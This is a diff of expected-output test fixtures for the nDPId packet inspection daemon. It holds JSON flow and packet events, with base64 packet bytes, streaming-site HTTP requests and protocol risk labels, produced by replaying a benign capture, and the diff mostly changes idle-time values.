+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} 
+00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
+00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
+00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 
@@ -152,21 +152,21 @@ 00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":180000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} 
-00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/movies\/mp4script\/10410?definition=true","code":0,"content_type":"","user_agent":""}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104380188,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104380188,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1470104380188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380188,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UhRAAIAGEmDAqHMI2vSHqsHHI4t8ty1+AAAAAIACIAAqAAAAAgQE7AEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1470104380300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104380300,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0c30AAHAGQPfa9IeqwKhzCCOLwccogsRifLctf4ASQAAcSgAAAgQFtAEDAwABAQQC"} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":463,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104380188,"flow_last_seen":1470104380302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1470104380302,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"218.244.135.170","src_port":49607,"dst_port":9099,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"218.244.135.170","url":"218.244.135.170:9099\/api\/qqlive_ckey\/get?vid=y0013xaeeyo&platform=10902","code":0,"content_type":"","user_agent":"Mozilla\/5.0"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1470104379903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379903,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgZAAIAG5uXAqHMIarkjbsHFAFDej0WbAAAAAIACIACnvwAAAgQE7AEDAwgBAQQC"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379916,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379916,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} +00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
